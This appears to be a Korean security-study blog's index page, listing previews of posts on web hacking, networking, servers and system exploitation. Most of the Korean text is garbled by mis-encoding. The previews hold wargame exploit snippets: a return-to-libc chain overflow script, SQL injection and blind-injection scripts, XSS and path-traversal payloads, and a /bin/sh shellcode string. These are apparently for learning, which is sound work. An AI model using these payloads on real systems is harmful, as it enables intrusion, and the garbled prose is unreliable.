728x90 ๋ฐ์ํ Security Study83 string filter(php) php://filter/string.rot13/resource=example.com http://php.net/manual/en/filters.string.php Security Study/Web 2016. 10. 5. apmsetup์์ forbidden๋ฌธ์ ํด๊ฒฐ apmํด๋๋ฅผ ๋ค์ด๊ฐ์ (ex)C:\APM_Setup\Server\Apache\conf) < -์ด๋ ๊ฒ ๋ค์ด๊ฐ์ httpd.confํ์ผ์ ๋ฉ๋ชจ์ฅ์ผ๋ก ์ด์ด ์๋์๊ฐ์ด ์์ ํด์ค๋ค. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2. Networkkkkk... ๋คํธ์ํฌ ?๋คํธ์ํฌ ๊ธฐ์ด ์ด๋ก ๋ฉ์์ง - ๋คํธ์ํฌ๋ก ์ ์กํ ์์ ๋จ์์ ๋ฐ์ดํฐ๋ฅผ ํจํท์ด๋ผ๊ณ ์ฌ์ฉํ์ง๋ง ์ด๊ฒ์ ํํํ๋ ์ข ๋ ๋ฒ์ฉ์ ์ธ ๋จ์ด๋ ๋ฉ์์ง- ํจํท์ ๋ค์ํ ์ํฉ์์ ํ ์ฅ๋น๊ฐ ๋ค๋ฅธ ์ฅ๋น๋ก ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์ธ๊ธํ๋ ๋ฐ ์ฐ์ด๋ ์ฌ๋ฌ ์ฉ์ด์ค ํ๋- ๊ฐ ์ฉ์ด OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ํน์ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด๋ ๊ธฐ์ ๊ณผ ์ฐ๊ด๋์ด ์์ผ๋ฉฐ ๋ฉ์์ง๋ฅผ ์ง์นญํ ๋ ๊ฐ์ฅ ๋ง์ด ์ฐ์ด๋ ๋จ์ด๋ ๋ค์๊ณผ ๊ฐ๋ค.1) ํจํท – OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ๋ฝ,์ํฌ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์๋ฏธ2) ๋ฐ์ดํฐ ๊ทธ๋จ – ๊ธฐ๋ณธ์ ์ผ๋ก ํจํท๊ณผ ๋์์ด ๋คํธ์ํฌ ๊ณ์ธต ๋ฉ์์ง๋ฅผ ์๋ฏธ3) ํ๋ ์ -4) ์ 5) PDU ๋ฉ์์ง ํฌ๋งคํ (ํค๋, ํ์ด๋กฃ, ํธํฐ)- ๋ฉ์์ง๋ ๋คํธ์ํฌ๋ฅผ ํตํด ์ ๋ณด๋ฅผ ์ ์กํ๋ ๋ฐ ์ฐ์ด๋ ๊ตฌ์กฐ- ๋ฉ์์ง๋ ํ๋กํ ์ฝ์ด๋.. Security Study/Network 2016. 2. 10. hosting ์ํ๊ธฐ์ํ ๊ธฐ๋ณธ? ์น์ฌ์ดํธ๋ฅผ ๋ง๋ค๋ฉด ํธ์คํ ์ด๋ ๊ฒ์ ์ด์ฉํ์ฌ ์๋ก ์ฐ๊ฒฐ ์ํจ๋ค. ๊ฑฐ๊ธฐ์ ๋ณด๋ฉด DNS nameserver ๋ฑ ์ด๋ฌํ ๋ง์ด ๋์ค๋๋ฐ ๊ณผ์ฐ ๋ฌด์์ผ๊น? ์ฝ๊ฒ๋ณด์!! DNS๋ ?Domain Name Server IP์ฃผ์๋ฅผ ์ธ๊ฐ์ด ๊ธฐ์ตํ๊ธฐ ํธํ ์ธ์ด์ฒด๊ณ๋ก ๋ณํํ๋ ํด์ฃผ๋๋ฐ ์ฌ์ฉ๋๋ค. Nameserver๋? ์๋ฌธ ๋๋ฉ์ธ์ ๋ค ์๋ฆฌ์ IP์ฃผ์๋ก ๋งคํ ์์ผ์ฃผ๋ ์๋ฒ๋ฅผ ๋งํ๋ค. Security Study/Web 2015. 12. 13. mac ํฐ๋ฏธ๋ vim ๊พธ๋ฏธ๊ธฐ vi ~/.vimrc 2 || has("gui_running") syntax on set hlsearchendif " Only do this part when compiled with support for autocommands.if has("autocmd") " Enable file type detection. " Use the default filetype settings, so that mail gets 'tw' set to 72, " 'cindent' is on in C files, etc. " Also load indent files, to automatically do language-dependent indenting. filetype plugin indent on " Put these in.. Security Study/Source 2015. 12. 10. ubuntu ๋๋ ํ ๋ฆฌ ๋ฆฌ์คํ ๋ง๊ธฐ ์๋ฒ๋ฅผ ์ด์ํ๋ค๋ณด๋ฉด ๋๋ ํ ๋ฆฌ๋ฆฌ์คํ ๋๋ฌธ์ ๊ฑฑ์ ํ์๋ ์ฌ๋์ด ๋ง์ ๊ป๋๋ค. ์ฐ๋ถํฌ๋ฅผ ์ฌ์ฉํ์๋ ๋ถ๋ค์ ์ฃผ๋ชฉ!!! vi /etc/apache2/apache2.conf Security Study/Server(Linux) 2015. 12. 10. Cyber Law ์ ๋ณดํต์ ์ ๋ฐ์ => ์ธ์๊ณผ ์ ๋์ ๋ณํ๋ฅผ ํ์๋ก ํ๋ค. ๋ํ ์ ๋ณดํต์ ๋ถ์ผ์ ๋ณํ์ ๋ฐ์ ์ผ๋ก ๋ฒ์ด ๋ฐ๋ ์ ๋ฐ์ ์์.์ด๋ฌํจ์ ๋ฐ๋ผ ๊ฐ๋ฅ์ฑ๊ณผ ์ํ์ฑ์ ๊ฐ์ง๊ณ ์๋๋ฐ๊ฐ๋ฅ์ฑ : ์ฌํ๋ ์ํ์ ๋ ธ์ถ๋๋ ๊ฒฝ์ฐ๊ฐ ์๊ธฐ๊ฒ ๋๋ค.์ํ์ฑ : ์ฌํ ๋ฐ์ ์ ๊ฐ๋ฅ์ฑ์ ์ฐจ๋จํ๊ฑฐ๋ ์ ํดํ๋ ๊ฒฐ๊ณผ๋ฅผ ๊ฐ์ง๊ฒ ๋๋ค. ์ฌ์ด๋ฒ ๊ณต๊ฐ์ ์ ๋ณดํ์ ์๊ธฐ๋ฅ์ผ๋ก ์ธ๋ฅ์๊ฒ ์๊ธฐ๋ฅ์ ๋ฐํํ๊ณ ์์ง๋ง, ๋ฐ๋๋ก ์ ๊ธฐ๋ฅ์ด๋ผ๊ณ ํ ์ ์์ ๋งํผ์ ๋ง์ ๋ฒ์ฃ์ ๊ฐ์ข ๋น์ค๋ฆฌ์ ์ด๊ณ ๋ฐ์ฌํ์ ์ธ ํ์๊ฐ ์ผ์ด๋๊ธฐ๋ ํ๋ค. ์ธํฐ๋ท์ ํน์ง - ์ต๋ช ์ฑ : ์ธํฐ๋ท์์๋ ์ค๋ช ๊ณผ ์ ๋ถ์ ๋ฐํ์ง ์์ ์ ์๋ค. - ๋ถํน์ ๋ค์์ฑ - ์๊ฐ์ , ๊ณต๊ฐ์ ๋ฌดํ์ฑ - ๋ฌดํ์ ์ฑ ์ ๋ณดํต์ ์ ๋ฐ์ ์ ๋ฐ๋ฅธ ๋ฒ์ ๋ฌธ์ - ์ฌ์ด๋ฒ ๊ณต๊ฐ์ ๋ํ ๋ฒ์ ๊ท์จํ๋ - ์๋ก์ด ์ ํ์ ๋ฒ์ฃ -> ๊ธฐ์กด ๋ฒ์ .. Security Study/System Security 2015. 12. 9. XSS ๊ณต๊ฒฉ๊ธฐ๋ฒ XSS (Cross Site Scripting) ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํธ์ ์๋ฒ์ ์๋น์ค๋ฅผ ๊ณต๊ฒฉํ๋ ์ผ๋ฐ์ ์ธ ํดํน๋ฐฉ๋ฒ์ด ์๋๋ผ ํด๋น ์๋ฒ๋ฅผ ์ฌ์ฉํ๋ ์ฌ์ฉ์๋ฅผ ๊ณต๊ฒฉํ๋ ๊ธฐ๋ฒ์ด๋ค. 1. XSS ์ผ๋ฐ์ ์ธ ๊ณต๊ฒฉ ๊ธฐ๋ฒ์ ์ด๋ฌํ ๊ตฌ๋ฌธ์ ๋ฃ์์ผ๋ก ์ทจ์ฝ์ ์ด ์๋์ง ์์๋ณธ๋ค. ex) ํด๋ฆญ์ ํ์ฌ์ดํธ๋ก ์ด๋Click 2. iframe ํ๊ทธ ํ์ฌ์ดํธ๋ก ์ฐ๊ฒฐ ๊ฐ๋ฅํ๊ฒ ํจ ex) ์จ๊ฒจ์ง iframe๋ฅผ ์ด์ฉํด ํ์ฌ์ดํธ๋ก ์ด๋ 3. object ํ๊ทธ ex) ์ง์ ํ ํ์ผ์ด ์กด์ฌํ์ง ์์ ๋ค์ฌ์ดํธ๋ก ์ด๋ํ๋๋ก ํจ. 4. div ๊ธฐ๋ฒ ex) div ํ๊ทธ๋ฅผ ์ฌ์ฉํ์ฌ ์ด๋ฏธ์ง ๋ฑ์ ์ฝ์ ์ํจ๋ค. 5. ์ธ์ฝ๋ฉ ๊ธฐ๋ฒ ex) ๊ณต๊ฒฉํ๋ ค๋ ๋ฌธ์์ด์ ๋ค๋ฅธ ํํ์ผ๋ก ์ธ์ฝ๋ฉํ์ฌ ๋์ ๋ ์ง ์๊ฑฐ๋, IPS, ์น๋ฐฉํ๋ฒฝ ๋์ ๊ฐ์งํจํด์ ์ฐํํ๊ธฐ ์ํ์ฌ ์ธ์ฝ๋ฉํ๋ค... Security Study/Web 2015. 12. 1. ์ํธํ ๊ณ ๋ ์ํธ - ์ํธ๋ฌธ์์ ์๋ฌธ์ ์ ์ถํ ์ ์๋ค.ํ๋ ์ํธ - ๊ณ ๋์ํธ์ ๋ฐ๋๋ก ์ํธ๋ฌธ์์ ์๋ฌธ์ ์ ์ถํ ์๊ฐ ์๋ค.์ด์ ๋ ์์ฆ์ ํ๋์ํธ๋ ์ํ์ ์๋ฆฌ๋ก ํ๊ธฐ ๋๋ฌธ์ด๋ค. ํ๋ ์ํธ์๋ฐฉํฅ ์ํธํ - ์ํธ๋ฌธ์ ๋ค์ ํ๋ฌธ์ผ๋ก ๋ณต์์ ํ ์์๋ค. - ๊ฐ์ญ์ - Encrytion๋์นญํน ์ํธ vs ๊ณต๊ฐํค ์ํธ(= ๋น๋์นญํค ์ํธ)1) ๋์นญํค ์ํธ - ์ํธํค์ ๋ณตํธํ ํค๊ฐ ๊ฐ๋ค. - ๋น๊ต์ ์ฐ์ฐ์ ์์ด ์ ์ด ๊ณ์ฐ์ด ๋น ๋ฅด๋ค. - ์คํธ๋ฆผ ์ํธ์ ๋ธ๋ก ์ํธ ์ฆ, 2์ข ๋ฅ๋ก ๋๋๋ค.1) ์คํธ๋ฆผ ์ํธ - ํ ๋ฒ์ ํ ๋นํธ๋ ํ ๋ฐ์ดํธ ๋จ์๋ก ์ํธํ ๋๋ค. - ๋ธ๋ก ์ํธ๋ณด๋ค ๋น ๋ฅด๋ ๋ฎ์ ๋ณด์์ฑ์ ๊ฐ์ง๋ค. - ๋คํธ์ํฌ ์ก์์ , ์คํธ๋ฆฌ๋ฐ ๋ฑ์ ์ฌ์ฉ๋๋ค.2) ๋ธ๋ก ์ํธ - ํ ๋ฒ์ ํน์ ๋ธ๋ก(๋ฐ์ดํธ) ๋จ์๋ก ์ํธํ ๋๋ค. - ์ ํด์ง ํฌ.. Security Study/System 2015. 11. 28. ์น ํดํน ๊ธฐ๋ณธ ์น ํดํน์ ํ๋ ๋ฐฉ๋ฒ์๋ ํฌ๊ฒ 2๊ฐ์ง๋ก ๋๋์ด ์ง๋ค.1. ์ง๊ด์ ์ผ๋ก ์ทจ์ฝ์ ์ด ์์ ๋งํ ๋ถ๋ถ์ ์ฐพ์์ ์นจํฌํ๋ ๊ฒ์ด๊ณ ,2. ์ ๋ฐ์ ์ผ๋ก ๋ฐ๊ฒฌ ๊ฐ๋ฅํ ๋ชจ๋ ๊ณต๊ฒฉ ํ๋ฉด์ ์ฐพ์์ ๋งคํธ๋ฆญ์ค๋ฅผ ์์ฑํ ํ ํ๋์ฉ ๊ณต๊ฒฉํด๋ณด๋ ๊ธฐ๋ฒ์ด๋ค. ๊ธฐ๋ณธ์ ์ผ๋ก ํดํน์ ๊ณผ์ ์ ์ ๋ฆฌํ๋ฉด ๊ณต๊ฒฉ ๋์ ์ ์ -> ์ ๋ณด ์์ง -> ์ทจ์ฝ์ ๋ถ์ -> ๊ณต๊ฒฉ -> ํ์ ์ ๊ฑฐ์ด๋ฌํ ์์ผ๋ก ์ด๋ฃจ์ด ์ง๋ค. OWASP TOP10 1 - ์ธ์ ์ ์ทจ์ฝ์ 2 - ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํ 3 - ์ทจ์ฝํ ์ธ์ฆ ๋ฐ ์ธ์ ๊ด๋ฆฌ 4 - ์์ ํ์ง ์์ ์ง์ ๊ฐ์ฒด ์ฐธ์กฐ 5 - ํฌ๋ก์ค ์ฌ์ดํธ ์์ฒญ ๋ณ์กฐ 6 - ๋ณด์์ ์๋ชป๋ ๊ตฌ์ 7 - ์์ ํ์ง ์์ ์ํธ ์ ์ฅ 8 - URL์ ๊ทผ ์ ํ ์คํจ 9 - ๋ถ์ถฉ๋ถํ ์ ์ก ๊ณ์ธต ๋ณดํธ 10 - ๊ฒ์ฆ๋์ง ์์ ๋ฆฌ๋ค์ด๋ ํธ์ ํฌ์๋ Security Study/Web 2015. 11. 24. ์์ ํ๋ก์ธ์ค ๋๋ฒ๊น ํ๊ธฐ ๋๋ฒ๊น ์ ํ๋ค๋ณด๋ฉด ์์ ํ๋ก์ธ์ค๋ ๋๋ฒ๊น ์ด ๋์ง ์์ ๋๋ ์๋๊ตฐ์! ๊ทธ๋์ ํ๋ฒ ๊ฒ์ํด ๋ดค์ต๋๋น!! ๊ฒ์์ ํด๋ณด๋ MSDN์๋์ ์ด ํจ์๊ฐ ๋์ค๋๋ฐ์!! ์ด ์ดํจ์๋ฅผ ์ ์ฝ์ด ๋ณด๋ DEBUG_PROCESS ๋ผ๋ ๊ฒ์ ์ฐพ์ ์ ์์์ต๋๋ค. DEBUG_PROCESS ์ด๋ Process Creation์ ์ธ์๋ก debug_process์ธ์๋ก ๋๊ฒจ์ฃผ๋ฉด ๋๋ค๊ณ ๋ช ์๋์ด ์์ต๋๋ค. Security Study/System 2015. 11. 22. rtl chain from socket import * HOST = ""PORT = 4444 s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x40\xa0\x04\x08"+"\x54\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x41\xa0\x04\x08"+"\x57\x81\x04\x08"payload += "\xa0\x83\x04\x08"+"\x2e\x86\x04\x08"+"\x42\xa0\x04\x08"+"\x56\x81\x04\x08"payload += "\xa.. Security Study/Source 2015. 11. 21. sql injection reverse import urllibimport urllib2 url = ""req = urllib2.Request(url)sql = "union select 0x61646D696E 32%"data = "id=%00&pw=" + sql[::-1]#data = urllib.urlencode(data)req = urllib2.Request(url, data) req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')req.add_header('Cookie', 'PHPSESSID=') response = urllib2.urlopen(req)h.. Security Study/Source 2015. 11. 21. ์์ผํ๋ก๊ทธ๋๋ฐ from socket import * HOST = "" #hostPORT = 4444 #port s = socket(AF_INET,SOCK_STREAM)s.connect((HOST,PORT)) #connect payload = "\x90"*260 #payload print s.recv(1024) #1024 byte reads.send(payload + "\n")print s.recv(1024)print s.recv(1024) Security Study/Source 2015. 11. 21. Blind Sql Injection #http2,1)%3C%27N%27)--+&pw=adminimport urllibimport urllib2 ans =""ans2="" for i in range(1,11): for j in range(33,127) : url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password," url1=url1+str(i)+",1)='" url1=url1+chr(j)+"')--+&pw=1" try: #print url1; req = urllib2.Request(url1) print 1111 req.add_header('cookie',"PHPSESSID=") res = urllib2.urlopen(req) dat.. Security Study/Source 2015. 11. 21. Base 64 encoding import base64 str64=""str64=base64.b64encode(str64.encode('ascii'))for i in range(1,11): str64=base64.encodestring(str64) str64=str64.decode("utf-8")print(str64.replace("\n","")) Security Study/Source 2015. 11. 21. ๊ตฌ๊ธ ํดํน ๊ตฌ๊ธ ํดํน์ด๋?์ด๋ฆ๋ง ๋ณด๋ฉด ๊ตฌ๊ธ์ ํดํนํ๋ ๋ฏํ ๋๋์ด ๋ ๋ค. ๊ทธ๋ฌ๋ ์ด๊ฒ์ด ๊ตฌ๊ธ ํดํน์ด์๋๋ผ ๊ตฌ๊ธ์ ์ฐ์ฐ์๋ค์ ์ด์ฉํ์ฌ ์๊ณ ์ ํ๋ ์ ๋ณด๋ฅผ ๋ฝ์ ๋ด๋ ๊ฒ์ ๋งํ๋ค.๊ตฌ๊ธ์๋ ๋ง์ ์ฐ์ฐ์๊ฐ ์๋ค. ์ด๋ฅผ ์ด์ฉํ์ฌ ๊ฐ์ธ ์ ๋ณด ๋ฟ๋ง ์๋๋ผ ๋ง์ ์ ์ ์ ๋ณด๋ฅผ ์์ ๋ผ์ ์๋ค. ๊ณผ์ฐ ๊ตฌ๊ธ ํดํน์ด ์ผ๋ง๋ ์ํํ ๊น? ์ด๋ฌํ ์์ผ๋ก ์ ์๋ฅผ ๊ฒ์ํ๋ฉด ์ด๋ฌํ ๋ธ๋ก๊ทธ๋ค์ด ๋์ค๋ ๊ฒ์ ์์ ์๋ค.๊ณผ์ฐ ์ด๋ฆ์ด๋ ์ ํ๋ฒํธ ๊ฐ์ ๊ฐ์ธ์ ๋ณด๋ฅผ ์๊ณ ์๋ ์ํฉ์์ ๊ฒ์์ ํ๋ฉด ๋ ๋์ฑ ๋ง์ ์๋ฃ์ ๋ ๋ง์ ์ ๋ณด๊ฐ ๋์ฌ ๊ฒ์ด๋ค. ๊ตฌ๊ธ ํดํน์ ์ผ๋ฐ์ ์ธ ๊ณต๊ฒฉ์ ๋ณด๋ฉด๋ฐ์ดํ(" ")๋ฐ์ดํ๋ฅผ ์ด์ฉํ๋ฉด ์ฌ๋ฌ๊ฐ ๋จ์ด๋ฅผ ๋ฌถ์ด์ ๊ฒ์ํ ์ ์๋ค. ์๋ฅผ๋ค์ด, Pwn&Play z3alous๋ผ๊ณ ๊ฒ์์ ํ๋ฉด ~ Pwn&Play ~ z3alous ๋ก ๊ฒ์์ด ๋์ง.. Security Study/Web 2015. 11. 21. UBUNTU์์ QT๋ค์ด๋ฐ๊ธฐ ์ฐ๋ถํฌ์์ QT๋ฅผ ๋ค์ด๋ฐ์๋ณด์๋จผ์ http://www.qt.io/download-open-source/ qt ์คํ์์ค์ ์ ์ํด์ ๋ค์ด๋ฐ์ผ๋ฉด runํ์ผ์ด ์์ฑ๋์ด ์์ ๊ฒ์ด๋ค. ์ด๋ฅผ ๊ทธ๋ฅ ์คํ์ํค๋ ์ด๋ฌํ๊ฒ ๋ง์ ํ์ผ๋ค์ด ์ค์น๋๋ค...์ด๋ ๊ฒ ์ค์น๋ ํ์ผ์ ์ค์นํ๋ ์ค์น๊ฐ ๋์ง ์๋๋ค... ์์ด๋ด๊น?๋ฆฌ๋ ์ค์๋ ํฐ๋ฏธ๋์ด ์๋ค. ์ด๋ฅผ ์ด์ฉํด chmod 755 qt-unified-ninux-x64-online.run์ ํ ํ ./qt-unified-ninux-x64-online.run ์ด๋ ๊ฒ ์คํ์ํค๋ฉด ์ ์์ ์ผ๋ก ์คํ์ด๋๋ค.!!! ์ ํ!! ์ด๋ ๊ฒ ์ค์น๋๋ ๊ฒ์ ๋ณผ์์๋ค. !! Security Study/Server(Linux) 2015. 11. 16. ์๋ฒ ์ ์ ๋ฉ์ธ์ง, PHPMYADMIN ์ฃผ์ ๋ณ๊ฒฝ ubuntu ์๋ฒ์ ์ ์์ ํ์ ๋ ๋๋ฅผ ๋ฐ๊ฒจ์ฃผ๋ ์ฌ๋์ด ์๋ค๋ฉด ์ผ๋ง๋ ์ข์๊น?๊ทธ๊ฒ์ ์ํด ์ง๊ธ ์ฌ๊ธฐ์ ๊ธ์์จ๋ณด๊ฒ๋ค!!! ์๋ฒ์ ์ ์์ ํ๊ณ ๋์ root ๊ถํ์ผ๋ก vi /etc/motd์ ์น๋ฉด ์ฐฝ์ด ๋จ๋๋ฐ ํ๊ณ ์ถ์๋ง์ ์ ์ฅ ํ :wq ๋ก ์ ์ฅ์ ์๋ฃํ๋ฉด ์์ผ๋ก ์๋ฒ์ ์ ์ํ๋ฉด ๋ฐ๊ฒจ์ค ๊ฒ์ด๋ค.ํ๊ธ์ ์ด์ฉํ๊ณ ์ถ์ผ๋ฉด ํ๊ธํฉ์ ์ค์นํ๋ฉด ํ๊ธ ๊น์ง ์ฌ์ฉํ ์ ์๋ค. ๋ํ phpmyadmin์ฃผ์ ๋ณ๊ฒฝ์๋ phpmyadmin์ ์์ ๋๋ฉ์ธ/phpmyadmin์ด๋ฉด ์ ์์ ํ๋ค.์ด๋ฅผ ๋ฐ๊พธ๊ธฐ ์ํด ํ์ํ๊ฒ์ด vi /etc/phpmyadmin/apache.conf ์์ ์ ํด์ Alias /phpmyadmin /usr/share/phpmyadmin ์ด๊ฒ์ Alias /ํ๊ณ ์ถ์ ์ฃผ์/usr/share/phpmyadmin ํ.. Security Study/Server(Linux) 2015. 11. 11. RFHACKING Rf spectrum Analyzing๊ด๋ จํดGqrx – hack rfSdr#Gnu RadioRF analyzer – ์๋๋ก์ด๋์ฉ๋ ์์, ๋จ์ ์์ ์ ํ๋ ๊ธฐ๋ฅ ๋ฐ์์๋ค. Rf signal replay attack GNU RADIOSdr ์ํํธ์จ์ด SDR = Software Defined Radio๋ฌด์ ์ ํธ ์ก์์ ๊ธฐ๋ฅ ๋ฆฌํ๋ผ์ดํ ๋์๋ ์์ค๋ฅผ ์ ์ฅํด์ฃผ๊ณ ํตrf๋ก์ ์ก์ ํ๋ฒ ์กฐ์ฌ - ism ๋ฐด๋ ์ฃผํ์ ๋์ญ ๊ฒ์ – ๋ฌด์ ์ ํธ ์บก์ณ – ๊ทธ๋ฆฌ๊ณ ๋ฆฌํ๋ผ์ด๋ก ๋ณด๋ Security Study/Network 2015. 10. 29. web 2์ผ์ฐจ LFI1. Local File Include Attack ์ ์ค์๋ง2. Include, require ๋ฑ์ ํจ์๊ฐ ์ฃผ ํ๊ฒ3. ์ํ๋ ์ฝ๋๋ฅผ ์คํํ ์ ์์ผ๋ ํฌ๋ฆฌํฐ์ปฌ ๋ฉ์ธํ์ด์ง – ๋ก๊ทธ์ธ- ๊ธ์ฐ๊ธฐ- ํจ์ค์๋ ํ์ผ- ์ ๋ก๋ํ ํ์ผ ๊ณผ์ฐ ์ฐ๋ฆฌ๊ฐ ์ํ๋ ์ฝ๋๋ฅผ ์ด๋ป๊ฒ ๋ฃ์ง?1. /proc/self/environ2. /proc/loadavg/proc/$PID/environ3. ์น์๋ฒ ๋ก๊ทธ4. ์๋ฌ ๋ก๊ทธ----------------------------- ๋ฒ์ ์ด ์ฌ๋ผ๊ฐ๋ฉด์ ์์ ๊ณต๊ฒฉ์ ํ๋ค์ด์ง5. ํ์ผ ์ ๋ก๋ -> ๋ง์ด ์ฌ์ฉ๋จ ์ฝ๋๋ง๊ณ wrapper1. fopen, copy, file๋ฑ์ ํจ์์ ์ฐ์2. file://, http://, ftp:// ๋ฑ๋ฑ3. ๋๋ถ๋ถ์ ๋ํผ๊ฐ allow_url_include ๊ฐ o.. Security Study/Web 2015. 10. 23. windows And linux ip์ฐจ๋จ ์๋์ฐ ๊ฐ์ ๊ฒฝ์ฐ๋ ๋ฐฉํ๋ฒฝ์ ์ฐ๋๋ฐ... ์ฌ๊ธฐ์ ๊ณ ๊ธ ์ค์ ์ ํด๋ฆญํ ๋ค์์ ๋๋ฅด๊ณ ํฌํธ์ ํ๋กํ ์ฝ ์ฐจ๋จ ์์ดํผ๋ฅผ ์ค์ ํ๋ค. ๋ฆฌ๋ ์ค์ ๊ฒฝ์ฐ sudo iptables -A INPUT -s ์ฐจ๋จํ๊ณ ์ถ์ ์์ดํผ -j DROP iptables -L -> ๋ฆฌ์คํธ ๋ณด๋ ๋ช ๋ น์ด Security Study/Server(Linux) 2015. 10. 22. integer overflow #include int main(){ int a,b; printf("a + b = 0 (a,b != 0)\n"); printf("A = "); scanf("%d",&a); printf("B = "); scanf("%d",&b); if(a + b == 0) { printf("Congratulation!\n"); } else if(a == 0 || b ==0) { printf("Fuck up!\n"); } else { printf("Fuck you!\n"); } return 0;} integer overflow๋?๊ธฐ๋ณธ ์ ์ํ์์ ์ ์ฅํ ์ ์๋ ๊ธฐ๋ณธ์น์ ๊ฐ๋ณด๋ค ๋ ํฐ ์๋ฅผ ์ ๋ ฅํ์ฌ ์๊ธฐ์น ์์ ํ๋์ ์ทจํ๊ฒ ํ๋ ๊ฒ Security Study/System 2015. 10. 22. webhacking web hacking - 1) ์๋ฒ์ ์๋ ๊ฐ์ธ์ ๋ณด ํ์ทจ 2) ์์คํ ํดํน์ ์ํ ๋ฐํ XSS(ํฌ๋ก์ค ์ฌ์ดํธ ์คํฌ๋ฆฝํธ) - ๊ณต๊ฒฉ์๊ฐ ์๋ฒ๋ฅผ ํตํด ์ฌ์ฉ์๋ฅผ ๊ณต๊ฒฉ ๋ค๋ฅธ ์ฌ์ฉ์์ฟ ํค๋ ์ธ์ ์์ด๋๋ฅผ ํ์ทจํด์ ์ฌ์ฉ์์ ๊ถํ์ ์ต๋sotored - ์ ์ฅ๋์๋ ๊ฒ (์ด๋ฒคํธ ํธ๋ค๋ฌ) – ์ด์ฉ ex) bob"onmouseover="alert(1)" ๋ฐ์ ๋์ค์ด ํ์คํฌ๋ฆฝํธ‘”a=’ ‘onerror=alert(1);> reflected – ์ฟ ๊ธฐ, ์ฌ์ฉ์์ ๊ฐ์ ์๋ฒ์ ๋ ๋ ธ์ ๋ ๋ฆฌํด๊ฐ์ผ๋ก ‘);alert(‘1%0aalert(1);/* -> %0a ๊ฐํ๋ฌธ์ ์ด์ฉ ๋ค์ด๋ก๋ ์ทจ์ฝ์ ../../target -> ์์ ๋๋ ํ ๋ฆฌ๋ก ์ฌ๋ผ๊ฐ../target%00 -> NULL.\./targetindex.phpinext.pp Security Study/Web 2015. 10. 16. system 24byte shellcode \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80 Security Study/System 2015. 10. 15. ์ด์ 1 2 3 4 ๋ค์ 728x90 ๋ฐ์ํ